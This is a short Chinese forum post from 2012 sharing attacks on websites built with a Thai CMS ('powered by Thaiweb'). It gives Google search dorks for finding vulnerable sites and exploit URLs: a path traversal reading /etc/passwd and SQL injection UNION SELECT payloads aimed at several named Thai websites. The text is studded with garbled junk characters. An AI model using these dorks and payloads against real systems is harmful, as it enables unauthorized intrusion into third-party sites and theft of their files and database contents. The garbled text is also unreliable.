Google之:
2 E# Q& N: _' r% r( c
$ @4 h3 _' V& P9 a" o! {% v" Nintext:powered by Thaiweb
! H' n7 j: x* I3 z) n8 G- n" z9 n% W V3 l
inurl:index.php?page=board.php
. V' h2 L {( [/ H5 T; }1 z' j9 D( b, U, u5 E
/ X: X, V$ T I; F/ X9 H4 J" |6 D
h* O: ?- u/ @, e; C- |, `利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd: W( k! F0 x( P' I* Q7 d0 V. K
. c6 i0 }: p0 s, i- e- O
7 s' g- |7 t- k8 G5 h$ D5 v, g$ P% |9 F4 t* U6 J E
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'4 O! r& ^ X+ A5 Z% X' R* y$ _& F
5 d2 F* l+ H* P
# Z% |- a; N$ v3 s1 f7 s$ c5 E7 ^
2 ?, y2 K( u( G2 ^/ n2 x% k, L
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--) u O8 Z+ e# j k% S& S) Q
% N: j; ?5 J$ |http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
6 I% R9 d) ~4 m* p0 P6 I ( ^: w8 A; m3 D3 E
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) l2 f+ m8 Y! G |
发表于 2012-12-27 08:38:39
收藏
支持
反对